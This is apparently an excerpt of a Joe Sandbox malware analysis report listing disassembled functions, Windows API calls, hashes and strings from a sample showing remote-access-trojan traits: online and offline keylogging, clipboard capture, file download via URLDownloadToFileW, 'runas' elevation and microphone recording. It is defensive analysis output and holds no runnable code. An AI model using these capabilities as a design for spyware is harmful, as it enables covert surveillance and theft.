                                                                                                • Instruction ID: 9460c0e9f1be17d3a5c73fdfb64ffb2f3e7011bcb4b74989fe8713925d790063
                                                                                                • Opcode Fuzzy Hash: 7d1abebc12fc94ec9a74679c21743bb31c0bab12d6289aad5436d2a906a43a00
                                                                                                • Instruction Fuzzy Hash: 75F0F6B1245318BFE2101B25ECD8FBB365CEB867A9F00053EF801A22C1CA298C059176
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C143
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C156
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C181
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C189
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleOpenProcess
                                                                                                • String ID:
                                                                                                • API String ID: 39102293-0
                                                                                                • Opcode ID: ad13b29b5186b8d2a777d246caf505faf64a93951fc8710eab1e0b4fee4cd567
                                                                                                • Instruction ID: dfdfa86792278b502d1eb42efa140159a66a7ff1f98b550c11ab3cc3ce1a0da6
                                                                                                • Opcode Fuzzy Hash: ad13b29b5186b8d2a777d246caf505faf64a93951fc8710eab1e0b4fee4cd567
                                                                                                • Instruction Fuzzy Hash: 04012B312C0314BBD61057949C89FF7B26CDB48B56F000167F904D21A2EFA4CC818A69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004397BA
                                                                                                  • Part of subcall function 00439DF2: ___AdjustPointer.LIBCMT ref: 00439E3C
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 004397D1
                                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004397E3
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439807
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 2633735394-0
                                                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                • Instruction ID: be155fe4af78ede5c1a3c25ed52085de123386828037b7556834d3f12658177e
                                                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                • Instruction Fuzzy Hash: E1010532000509BBCF12AF55CC41E9A3BAAEF4C714F14901AF91861121C3BAE861DBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00CC9CE0,00000000,?,00CCF6A6,00000000,00000000,00CC9CE0,?,?,00000000,00000000,00000001), ref: 00CC9BFA
                                                                                                • GetLastError.KERNEL32(?,00CCF6A6,00000000,00000000,00CC9CE0,?,?,00000000,00000000,00000001,00000000,00000000,?,00CC9CE0,00000000,00000104), ref: 00CC9C04
                                                                                                • __dosmaperr.LIBCMT ref: 00CC9C0B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2398240785-0
                                                                                                • Opcode ID: 7cc8c614f4d0714d1c07f39f9de18242949781b501790c41a059482a9bb9b58d
                                                                                                • Instruction ID: d621ce72b4515d75933b1d2ae03cc5073bae6c05d8568f745a9a6e554fbdcdf2
                                                                                                • Opcode Fuzzy Hash: 7cc8c614f4d0714d1c07f39f9de18242949781b501790c41a059482a9bb9b58d
                                                                                                • Instruction Fuzzy Hash: BEF06932200616BB8B206BA2CC08F6ABFA9FF443A03008529F429D6520D731E861DBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00CC9CE0,00000000,?,00CCF71B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00CC9B91
                                                                                                • GetLastError.KERNEL32(?,00CCF71B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00CC9CE0,00000000,00000104,?), ref: 00CC9B9B
                                                                                                • __dosmaperr.LIBCMT ref: 00CC9BA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2398240785-0
                                                                                                • Opcode ID: e9c6864003f9423f7cb126fbe4321a774f15465195c880e8e8dd9f702133b541
                                                                                                • Instruction ID: 3df819d765015c38f492acc22c08c878e7a2678d7f7066068de2ab842ce8e320
                                                                                                • Opcode Fuzzy Hash: e9c6864003f9423f7cb126fbe4321a774f15465195c880e8e8dd9f702133b541
                                                                                                • Instruction Fuzzy Hash: B2F03C32600515BB8B206FA2EC0CF5ABFA9FF483A03048559F52ED6520D731ED61DBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-0
                                                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                • Instruction ID: a8a10265127c763042278c4190aab65d811543c76a51fb13ac7f57df5cb55ee0
                                                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                • Instruction Fuzzy Hash: 1CF0AFB1B0432A4BD700EE758C55A6F6BD9ABD9364F10083FF61987281EEACDC458B85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00CB48D0,00000000,00CE17E8,00000000,00CB48D0,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0), ref: 00CD3DC6
                                                                                                • GetLastError.KERNEL32(?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000,00CB48D0,?,00CCF432,00CB48D0), ref: 00CD3DD2
                                                                                                  • Part of subcall function 00CD3D98: CloseHandle.KERNEL32(FFFFFFFE,00CD3DE2,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000,00CB48D0), ref: 00CD3DA8
                                                                                                • ___initconout.LIBCMT ref: 00CD3DE2
                                                                                                  • Part of subcall function 00CD3D5A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CD3D89,00CD33F4,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000), ref: 00CD3D6D
                                                                                                • WriteConsoleW.KERNEL32(00CB48D0,00000000,00CE17E8,00000000,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000), ref: 00CD3DF7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: defc4f51f8777ae306f9f83015c490b59974d615af36779577a16d62f85d3490
                                                                                                • Instruction ID: 0a725f557f8091cb3250c736169271bf7ca53c248fcb988dcf5195326c9fedbc
                                                                                                • Opcode Fuzzy Hash: defc4f51f8777ae306f9f83015c490b59974d615af36779577a16d62f85d3490
                                                                                                • Instruction Fuzzy Hash: 2CF01C360111D8BBCF222F95DC09B8D3F67FB083A1B044011FA1986230C732AA64AFA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00CC7BCA
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CC7A83), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(?,?,00CC7A83), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CC7BDD
                                                                                                • _free.LIBCMT ref: 00CC7BEE
                                                                                                • _free.LIBCMT ref: 00CC7BFF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 1ac0fd3876493d355ec9ae33cfc928b78fa0a7262bb9afd0908adecd33839de4
                                                                                                • Instruction ID: 61364ed3c3bb48ae063cd6cde11121979403e16f87bc24a1d2931dc027e6499e
                                                                                                • Opcode Fuzzy Hash: 1ac0fd3876493d355ec9ae33cfc928b78fa0a7262bb9afd0908adecd33839de4
                                                                                                • Instruction Fuzzy Hash: 58E04679809AA0AB8B022F64FCC1B1E3BB1A708714322090EF6000B231CF314052BF86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438E71
                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438E76
                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438E7B
                                                                                                  • Part of subcall function 0043A37A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A38B
                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438E90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                • String ID:
                                                                                                • API String ID: 1761009282-0
                                                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                • Instruction ID: f0afba6f7780d5bf74e6a5573e22c31841aeff3766371a409bd4a5a5d01ecf52
                                                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                • Instruction Fuzzy Hash: 60C00244480345545C507AB256132AE83005AAE78CF8474CFBD90976038F4F042BA47F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CB2B70: RegOpenKeyExA.ADVAPI32(?,00000400,00000000,00000001,?), ref: 00CB2CC1
                                                                                                  • Part of subcall function 00CB2B70: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?), ref: 00CB2CE9
                                                                                                  • Part of subcall function 00CB2B70: RegCloseKey.ADVAPI32(?,?,00000400,00000000,00000001,?), ref: 00CB2CF2
                                                                                                  • Part of subcall function 00CB3C30: ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 00CB36ED
                                                                                                • Sleep.KERNEL32(000003E8), ref: 00CB3CDA
                                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000000,?), ref: 00CB3E3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentDirectoryExecuteOpenQueryShellSleepValue
                                                                                                • String ID: runas
                                                                                                • API String ID: 203667995-4000483414
                                                                                                • Opcode ID: ab0b8c8af1a05765e033405e23ecfc0efcd941ea44c841d3c0376ded647b872c
                                                                                                • Instruction ID: 1b6fe5ad244bb103202bf5ed356dea60cc461e015a26d8dfa6f7cc460930bf25
                                                                                                • Opcode Fuzzy Hash: ab0b8c8af1a05765e033405e23ecfc0efcd941ea44c841d3c0376ded647b872c
                                                                                                • Instruction Fuzzy Hash: 5EB10471A101846BDF08EB78DD86BAD7B329F82304F24425CF8459B2D7EB35DA818791
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442C2D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                • Opcode ID: 7999687525a5f056358f4945bcea889633b97b56b968074450efa294ab446d87
                                                                                                • Instruction ID: 800cb06e21c1ea329817983786c60422269b4338f3bf5502af9070688d2886a7
                                                                                                • Opcode Fuzzy Hash: 7999687525a5f056358f4945bcea889633b97b56b968074450efa294ab446d87
                                                                                                • Instruction Fuzzy Hash: F8515761E0420286FB117B14CE4137F6B94DB40B52F604D6BF096863AAEA7CCCD59A4F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0044EBAC: GetOEMCP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBD7
                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EE7A,?,00000000), ref: 0044F04D
                                                                                                • GetCPInfo.KERNEL32(00000000,zD,?,?,?,0044EE7A,?,00000000), ref: 0044F060
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CodeInfoPageValid
                                                                                                • String ID: zD
                                                                                                • API String ID: 546120528-361017932
                                                                                                • Opcode ID: d909b0be240222fe978c7b716fa69cf7422d1dad7e7577119cbb316c27c3ad00
                                                                                                • Instruction ID: 95e1a41fa6d7b96ba5c2a24ac673e79d39a036a2d94f7298004cea64e63b24f6
                                                                                                • Opcode Fuzzy Hash: d909b0be240222fe978c7b716fa69cf7422d1dad7e7577119cbb316c27c3ad00
                                                                                                • Instruction Fuzzy Hash: 4051F471A002569EFB20CF76C8816BBBBE5EF81314F14807FD48687252D63D994ACB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004346BE: __onexit.LIBCMT ref: 004346C4
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040B6E5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                • API String ID: 1881088180-3686566968
                                                                                                • Opcode ID: 0a76b94eed9a08ec5b985df72ed2e6a5023733a010cc686f9691e10a4908fbbc
                                                                                                • Instruction ID: 16c0118c4940dc8c8cdefc39caf5514adba26d66fbf19c316674452536a64041
                                                                                                • Opcode Fuzzy Hash: 0a76b94eed9a08ec5b985df72ed2e6a5023733a010cc686f9691e10a4908fbbc
                                                                                                • Instruction Fuzzy Hash: 4F215E31A001155ACB04FB66DC929EEB365EF94318F10443FE905771D2EF386D4A8A9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451CD3,?,00000050,?,?,?,?,?), ref: 00451B53
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: 36be01f97a537e8ba0716070fa63bca62691f225810e3a6ae3673f48be3d0d2c
                                                                                                • Instruction ID: 2aace4edf02333579f01dd7c3f1da6a92a169870855e4ac957397fbfc8aeaab6
                                                                                                • Opcode Fuzzy Hash: 36be01f97a537e8ba0716070fa63bca62691f225810e3a6ae3673f48be3d0d2c
                                                                                                • Instruction Fuzzy Hash: 97214B66A01100A2D7319B54CD41F9B73AADF54B16F168427ED0AD7322F73AED48C358
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415C17,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415C17,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 481472006-1507639952
                                                                                                • Opcode ID: 2ff53a8d23a981aa545793ac31cbd4e6d03cb5d17771411f6f8dce199051bbd5
                                                                                                • Instruction ID: 408d130ebb64bbfd0941b37d565a602b4c828654bbe33badbbaee97ad12a9a8a
                                                                                                • Opcode Fuzzy Hash: 2ff53a8d23a981aa545793ac31cbd4e6d03cb5d17771411f6f8dce199051bbd5
                                                                                                • Instruction Fuzzy Hash: 7D2104719006405BD700B735980677F7BA4EB51308F84087EE8491B2E2EABD5A88CBEF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • Sleep.KERNEL32 ref: 0041658E
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004165F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadFileSleep
                                                                                                • String ID: !D@
                                                                                                • API String ID: 1931167962-604454484
                                                                                                • Opcode ID: 5204d5ebba49abcec9b2b75e421dbb2f3c49301a5bbfff731c75bc7ca4e4003c
                                                                                                • Instruction ID: 8eac3a0e3f46d7fc50306be76c602f9c05c650d7e8bc35a92d0807ed5fefabc8
                                                                                                • Opcode Fuzzy Hash: 5204d5ebba49abcec9b2b75e421dbb2f3c49301a5bbfff731c75bc7ca4e4003c
                                                                                                • Instruction Fuzzy Hash: E51151716083429AC714FF72D8969BE73A8AF50348F400C3FF546621E2EE3C9949C65A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                                • API String ID: 481472006-2430845779
                                                                                                • Opcode ID: 0965455ac3cc5cd251e471c145658d9518680e0d00218565a943323c8c49139a
                                                                                                • Instruction ID: 03358708bbd9b017bd50802dda466b5f99439c3f85cc638ee3aa4cbb1873ed31
                                                                                                • Opcode Fuzzy Hash: 0965455ac3cc5cd251e471c145658d9518680e0d00218565a943323c8c49139a
                                                                                                • Instruction Fuzzy Hash: CD1181715082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA48C65A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041AC8A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: alarm.wav$hYG
                                                                                                • API String ID: 1174141254-2782910960
                                                                                                • Opcode ID: cf1de3ebf6c25645386c743ed1e09933b39a6016a5cd876360c304ceb06d9f1d
                                                                                                • Instruction ID: 6fbaea307e372094891d743aaee9c0f939e2fdd96fa8816cbaee0bb86098aa9c
                                                                                                • Opcode Fuzzy Hash: cf1de3ebf6c25645386c743ed1e09933b39a6016a5cd876360c304ceb06d9f1d
                                                                                                • Instruction Fuzzy Hash: 4601B5B064460167C604B73598166EE37564B80328F10407FF68A672E2FFBC9D99C6DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0040B0B2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B0C0
                                                                                                  • Part of subcall function 0040B0B2: wsprintfW.USER32 ref: 0040B141
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                • CloseHandle.KERNEL32(?), ref: 0040B002
                                                                                                • UnhookWindowsHookEx.USER32 ref: 0040B015
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                • String ID: Online Keylogger Stopped
                                                                                                • API String ID: 1623830855-1496645233
                                                                                                • Opcode ID: 2859d79f17bbf3e4fb0ac891c95f1c75937c0af30917608a24bf154840fbb95d
                                                                                                • Instruction ID: 1efb9077e68cf03edcab76f53168a10b3f917b6d2ceb1aad6be5b684b2c268e0
                                                                                                • Opcode Fuzzy Hash: 2859d79f17bbf3e4fb0ac891c95f1c75937c0af30917608a24bf154840fbb95d
                                                                                                • Instruction Fuzzy Hash: A301B531A002109BD7257B75C80B7BE7BA59B41305F4004BFEA82226D2EBB91855D7DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B40,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                                • String ID: XMG
